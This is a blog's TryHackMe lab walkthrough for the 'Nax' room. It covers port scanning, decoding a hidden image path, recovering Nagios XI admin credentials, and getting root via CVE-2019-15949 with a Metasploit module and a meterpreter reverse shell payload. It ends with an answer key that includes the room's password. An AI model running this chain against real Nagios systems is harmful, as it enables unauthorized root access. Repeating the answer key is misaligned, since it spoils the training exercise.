Supasuge's Blog

Aspiring Information Technology/Cybersecurity Professional


Nax - TryHackMe Writeup

Enumeration

nmap -p- --min-rate 10000 --open 10.10.222.20

Ports open: 22, 25, 80, 443

Moving on to a service version/TCP scan with vulnerability detection scripts + OS detection:

sudo nmap -p22,25,80,443 -sCVT -O 10.10.222.20   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-04 23:45 EDT
Nmap scan report for 10.10.222.20
Host is up (0.33s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 62:1d:d9:88:01:77:0a:52:bb:59:f9:da:c1:a6:e3:cd (RSA)
|   256 af:67:7d:24:e5:95:f4:44:72:d1:0c:39:8d:cc:21:15 (ECDSA)
|_  256 20:28:15:ef:13:c8:9f:b8:a7:0f:50:e6:2f:3b:1e:57 (ED25519)
25/tcp  open  smtp     Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-03-23T23:42:04
|_Not valid after:  2030-03-21T23:42:04
|_smtp-commands: ubuntu.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
| ssl-cert: Subject: commonName=192.168.85.153/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Not valid before: 2020-03-24T00:14:58
|_Not valid after:  2030-03-22T00:14:58
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: 400 Bad Request
| tls-alpn: 
|_  http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), Linux 3.10 (93%), Linux 3.18 (93%), Linux 3.19 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host:  ubuntu.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • Ubuntu host
  • Port 22 (SSH): OpenSSH 7.2p2
  • Port 25 (SMTP): Postfix smtpd, certificate CommonName: ubuntu
  • Port 80 (HTTP): Apache httpd 2.4.18 (CVE-2019-0211: Apache 2.4.17 < 2.4.38 local privilege escalation)
  • Port 443 (HTTPS): Same as port 80

Port 80

I then opened up Firefox and checked the site on ports 80 and 443.

As you can see, we found the /nagiosxi path in the page source.

Also, we see the line "Welcome to elements" followed by abbreviations from the periodic table. At first I didn't even notice this; it didn't occur to me until after I was unable to find anything useful from directory enumeration and SMTP enumeration.

Using this information, I searched for a list of abbreviations from the periodic table. After writing a short Python script with itertools to gather the different combinations and trying directory brute forcing again... nothin. Damn. After scratching my head for a bit and getting nothing back from SMTP enumeration, I came back to the webpage and decided to try converting the elements listed above to their corresponding atomic numbers and then to ASCII characters:

python3 -c "print(''.join([chr(i) for i in [47, 80, 73, 51, 84, 46, 80, 78, 103]]))"
/PI3T.PNg
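As an added example (my code, not part of the original writeup), here is the same decoding step done generically in Python: element symbols are mapped to atomic numbers and then to ASCII, and the reverse direction is included so you can see which characters this trick can and cannot carry (only code points 1..118 have an element, so lowercase w, x, y, z and most punctuation above 118 can never appear). The symbol string in the test is reconstructed from the numbers decoded above, since the post itself doesn't list the symbols; the element table is the standard one.

```python
import re

# Element symbols in atomic-number order: index + 1 is the atomic number.
SYMBOLS = (
    "H He Li Be B C N O F Ne Na Mg Al Si P S Cl Ar K Ca Sc Ti V Cr Mn Fe Co Ni Cu Zn "
    "Ga Ge As Se Br Kr Rb Sr Y Zr Nb Mo Tc Ru Rh Pd Ag Cd In Sn Sb Te I Xe Cs Ba La Ce "
    "Pr Nd Pm Sm Eu Gd Tb Dy Ho Er Tm Yb Lu Hf Ta W Re Os Ir Pt Au Hg Tl Pb Bi Po At Rn "
    "Fr Ra Ac Th Pa U Np Pu Am Cm Bk Cf Es Fm Md No Lr Rf Db Sg Bh Hs Mt Ds Rg Cn Nh Fl "
    "Mc Lv Ts Og"
).split()
ATOMIC_NUMBER = {sym: i + 1 for i, sym in enumerate(SYMBOLS)}

# Every symbol is one capital letter plus at most one lowercase letter, so a
# case-sensitive run of symbols splits uniquely even without separators
# ("CoS" is Co + S, while "COs" is C + Os).
TOKEN_RE = re.compile(r"[A-Z][a-z]?")


def tokenize(text):
    """Split element symbols (space/comma separated or concatenated) into a list."""
    stripped = re.sub(r"[\s,]+", "", text)
    tokens = TOKEN_RE.findall(stripped)
    if "".join(tokens) != stripped:
        raise ValueError(f"not a sequence of element symbols: {text!r}")
    unknown = [t for t in tokens if t not in ATOMIC_NUMBER]
    if unknown:
        raise ValueError(f"unknown element symbol(s): {unknown}")
    return tokens


def decode_elements(text):
    """Element symbols -> atomic numbers -> ASCII string."""
    return "".join(chr(ATOMIC_NUMBER[t]) for t in tokenize(text))


def encode_elements(s):
    """ASCII string -> element symbols; raises for characters above 118."""
    out = []
    for ch in s:
        n = ord(ch)
        if not 1 <= n <= len(SYMBOLS):
            raise ValueError(
                f"{ch!r} (code point {n}) has no element; only 1..{len(SYMBOLS)} can be encoded"
            )
        out.append(SYMBOLS[n - 1])
    return out


if __name__ == "__main__":
    # Reconstructed symbol list: the elements whose numbers the writeup decodes.
    print(decode_elements("Ag Hg Ta Sb Po Pd Hg Pt Lr"))
```

Feeding the symbols from the page in either separated or concatenated form gives the same path; the encoder is there so you can quickly check whether a candidate string could even have been hidden this way.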

This brought us to a .png image (name shown above). From here I decided to download it so I could run exiftool on the image and see if I could find any useful information, as the picture itself doesn't really give much away. After running the tool, I was able to find the author of the photo: Artist: Piet Mandrian..... Nice!

After a quick Google search of Piet, one of the first pages was for an esolang (esoteric language) called Piet. Piet is described as a stack-based esoteric programming language in which programs look like abstract paintings. This fits the picture we downloaded, so I then looked up an online interpreter for Piet.

After running the image through the interpreter, we successfully got what looks like the admin username and password to log in with, nice!

After logging in, we can see that the version of Nagios XI in use is 5.5.6.

CVE-2019-15949: Nagios 5.6.6 and prior allows remote command execution as root. The exploit requires access to the server as the nagios user, or access as the admin user via the web interface. The getprofile.sh script, invoked by downloading a system profile, is executed as root via a passwordless sudo entry; the script executes check_plugin, which is owned by the nagios user. A user logged into Nagios XI with permissions to modify plugins, or the nagios user on the server, can modify the check_plugin executable and insert malicious commands to execute as root.
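The root cause here is a privilege boundary crossing: a script that runs as root via sudo executes a file that a lower-privileged account controls. As an added example from the defender's side (my code, not from the writeup or from Nagios), here is a small Python audit that takes the paths a root-invoked script calls and flags any that are owned by an untrusted uid or writable by group/other. The paths and the scenario in demo() are constructed; because a non-root process cannot create files owned by another user, the demo stands in a group-writable file for the nagios-owned plugin and treats the current uid as trusted, where a real audit would pass trusted_uids={0}.

```python
import os
import stat
import tempfile


def writable_by_others(mode):
    """True if the group or world write bit is set on a file mode."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_root_invoked(paths, trusted_uids=(0,)):
    """Check every file a root-executed script invokes.

    A path is flagged when it is owned by a uid outside trusted_uids or when
    it is writable by group/other: either way someone other than root can
    change what runs as root. Returns a list of (path, reason) findings.
    """
    findings = []
    for path in paths:
        try:
            st = os.stat(path)  # follows symlinks, as an exec would
        except FileNotFoundError:
            findings.append((path, "missing (a lower-privileged user may be able to create it)"))
            continue
        if st.st_uid not in trusted_uids:
            findings.append((path, f"owned by uid {st.st_uid}, not a trusted uid"))
        if writable_by_others(st.st_mode):
            findings.append((path, "writable by group/other"))
    return findings


def demo():
    """Constructed scenario: two helpers that a hypothetical root-run
    profile script calls. Returns findings keyed by basename."""
    with tempfile.TemporaryDirectory() as d:
        good = os.path.join(d, "hardened_helper")  # hypothetical name
        bad = os.path.join(d, "check_plugin")      # hypothetical path standing in for the plugin
        for p in (good, bad):
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\necho ok\n")
        os.chmod(good, 0o755)  # owner-only write, as a root-owned helper should be
        os.chmod(bad, 0o775)   # group-writable, as a plugin the nagios group can edit would be
        # The current uid is trusted here only because this demo cannot create
        # files owned by another user; a real audit uses trusted_uids={0}.
        findings = audit_root_invoked([good, bad], trusted_uids={os.getuid()})
    return [(os.path.basename(p), reason) for p, reason in findings]


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
```

Running it on a real host means feeding in the commands named by each passwordless sudo entry's target script; any finding is a path where a non-root user can change code that executes as root, which is exactly the shape of this CVE.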

To get root on this machine, you simply need to run the correct Metasploit module; searching msfconsole for the CVE above will find it, and running it gives you a shell as root!

$ msfconsole -q
[*] Starting persistent handler(s)...
msf5 > search CVE-2019-15949

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/linux/http/nagios_xi_authenticated_rce  2019-07-29       excellent  Yes    Nagios XI Authenticated Remote Command Execution


msf5 > use 0
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_authenticated_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path to NagiosXI
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   nagiosadmin      yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux (x64)


msf5 exploit(linux/http/nagios_xi_authenticated_rce) > exploit
# shell as root!

Questions

What hidden file did you find?

/PI3T.PNg

Who is the creator of the file?

Piet Mandrian

What is the username found?

nagiosadmin

What is the password you found?

n3p3UQ&9BjLp4$7uhWdY

What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000

CVE-2019-15949

What is the full path of the exploit on msfconsole?

exploit/linux/http/nagios_xi_authenticated_rce